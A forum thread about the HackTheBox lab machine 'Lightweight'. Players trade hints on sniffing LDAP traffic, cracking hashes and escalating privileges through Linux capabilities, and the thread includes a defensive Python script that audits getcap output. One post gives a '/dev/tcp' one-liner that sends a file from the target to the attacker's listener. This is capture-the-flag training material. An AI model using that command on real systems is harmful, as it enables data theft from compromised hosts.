Lightweight

@xnand said:

Wow this box was awesome! Didn’t have any knowledge on capabilities… Could never root it if it wasn’t for all the people hinting at them :slight_smile:

For people struggling with root, search well on google for this!

Don’t google too hard. While doing the same as you, I found literally a write-up on this box, complete with l*******1 path names.

I got user & root.

A very nice box, the priv escalation was amazing. RevShell here.

PM if you need help.

Nice box!
Got user, root and root shell in a funny and illustrative box.

Thanks to the creator :smiley:

Nice box!! Learned a lot about the LDAP request and the forum comments helped.
Got all the flags and rooted!!

Got user and root, really learned a lot from the box (and this forum).

Thanks to the creator for the fun and challenging experience! Feel free to PM me if you need any help with User or root

Left this box months ago and came back, still stuck at the same point. tcpdump doesn’t come up with anything while listening on either ens33 or lo; the only time anything ever comes up is when I do an ldapsearch that doesn’t contain any bind info.

Got user, working on root. I’ve done the whole cap privesc on a different box, can’t remember which one atm, so I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transferring files:

cat FILE >& /dev/tcp/YOUR-IP/PORT

should do the trick, just don’t forget to set up a netcat listener on your Kali box that pipes out to a file.

Okay, rooted the box last night. I really enjoyed this box, even with bits of frustration peppered here and there. A good progression from the other beginner box, Irked. Some really fun moments mixed in with confusing moments. Thumbs up, overall. As far as tips go, this thread has everything you need to root the box, likely even within the first 6 pages. But a quick summary for those just jumping to the last page, lol:

Initial Foothold - I don’t think you need any hints here!

User - This is two parts. For the first part you are going to have to take the motto of BackTrack (and I think, Kali) “The quieter you become the more you hear” to heart. If privesc paths seem limited, think of ways you can capture communication between two machines while sending something to be captured from the different services on the machine. Then, to make it easy, you can examine what you find on your Kali box with a well-known tool that lives under water with wires. Once you find what you’re looking for, think of ways to authenticate on the same machine.

User (Part 2) - The second part is your usual, most basic enumeration: look at everything you see in your new home folder and see if anything looks like it might contain interesting data. Check everything thoroughly before you move on. Then once you find what you’re looking for, get it on with johnny boy or a certain hashed feline. Once you have the keys to get in to the locked out place, you’ll have to check everything you find in an IDE or vim.

Root - Eazy Peazy! There is another box on HTB that might help guide you which is named after a famous character in a book we all used to “read” as children. If you’re still having trouble, think of your own capabilities and the capabilities of your Kali box (wink wink). The two binaries in your new home folder are your path to root. One is a red herring, the other is the path to the pot o’ gold. Don’t worry about a shell, just worry about escalating your privs to be able to read (and maybe write *wink *wink). There is a certain website that helps tremendously with this, but since I don’t want to give it away and make root TOO easy for you all, I’ll just say it’s one which ippsec talks about a lot and LOVES to use when rooting Linux boxes.

Good luck and Have fun, all!
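From the defender's side, the two themes hinted at in the summary above (packet capture by a non-root user, and binaries in a home folder carrying file capabilities) are both visible in `getcap -r` output. The following is an added example, not part of the thread or the box: the sample paths, the flagged capability sets and the "user-writable" prefix list are assumptions chosen for illustration.

```python
import re

# Capability classes the thread hints at: packet capture and file-permission bypass.
SNIFFING = {"cap_net_raw", "cap_net_admin"}
FILE_BYPASS = {"cap_dac_override", "cap_dac_read_search"}
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")  # assumed policy
CLAUSE = re.compile(r"^([a-z0-9_,]*)[=+]([eip]+)$")

def parse_getcap_line(line):
    """Parse one getcap line: old `path = caps+ep` or new `path caps=ep` layout."""
    parts = line.strip().rsplit(None, 1)
    m = CLAUSE.match(parts[1]) if len(parts) == 2 else None
    if not m:
        return None
    path = parts[0][:-2] if parts[0].endswith(" =") else parts[0]
    caps = set(m.group(1).split(",")) if m.group(1) else {"ALL"}  # bare "=ep"
    return path, caps, m.group(2)

def audit(getcap_output):
    """Map each risky binary to the reasons it was flagged."""
    findings = {}
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None or "p" not in parsed[2]:
            continue  # unparseable, or inheritable-only (grants nothing by itself)
        path, caps, _ = parsed
        reasons = []
        if "ALL" in caps:
            reasons.append("all capabilities (root-equivalent)")
        if caps & FILE_BYPASS:
            reasons.append("bypasses file permission checks")
        if caps & SNIFFING:
            reasons.append("can capture network traffic")
        if path.startswith(USER_WRITABLE):
            reasons.append("in a user-writable tree")
        if reasons:
            findings[path] = reasons
    return findings

# Constructed sample of `getcap -r / 2>/dev/null` output (not taken from the box).
SAMPLE = """\
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/alice/tool-a =ep
/home/alice/tool-b cap_net_bind_service=i
/usr/bin/backup-helper cap_dac_read_search=ep
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A capability-bearing binary that an unprivileged user can execute is worth reviewing even when the capability looks narrow; the usual remediation is `setcap -r` on the file or restricting who may execute it.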

Can somebody help with the initial user? I am getting nothing interesting in the tc****p output. Stuck on it for 3 days. Please DM.
Thanks

Can someone PM on what to do with the trigger and listen part? I am a bit stuck. I have found there is a certain page that takes longer to respond and I am connected with SSH but not sure how to listen and how to listen.

Edit: Got user then root shell. PM for any hints (learned a lot from this one and it was good fun). Also thanks to others who helped me out.

Good luck and have fun

Hey guys, I found ld******2 hash password, but I am really stuck now…
Can you PM me for a hint?

Got user, and root shell!
An awesome machine to learn a lot about Linux capabilities and networking!
Also if you google good enough there are some awesome tutorials about how to do priv esc with that.

Hi guys and girls!
This is my first try on a HTB box and I really can’t get very far. All I have is the SSH connection to my user account and a few dump files from Wireshark, where I cannot find any useful info yet… getting a little frustrated.

The hints with “capabilities” etc. didn’t help me much.
I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.

Thanks in advance :slight_smile:

Anyone kind enough to PM me with hint on path to User? Hours of getting nowhere, except a priv esc to Root theory. Thanks in advance :slight_smile:

I got some sdbm things, I don’t know how to use them, help!

Can anyone give me a hint towards the user? Already got some dump and some data, don’t know what to do with it. Thanks!

I found two binaries in the dir, and found there is something related to capability.
I followed that Medium article,
but I am still getting permission denied when reading files, even after applying the steps of that article properly.
Any help? Please DM
Thanks

Can anyone help me with the user stage? Send me a pm :slight_smile:

Stuck at the root stage.
Found user.txt.
Found files in /home/ldapuser1 but don’t know how to leverage them to gain root.
Tried to search for certificates and keys to decrypt traffic in pcap but no luck.
Any help would be appreciated.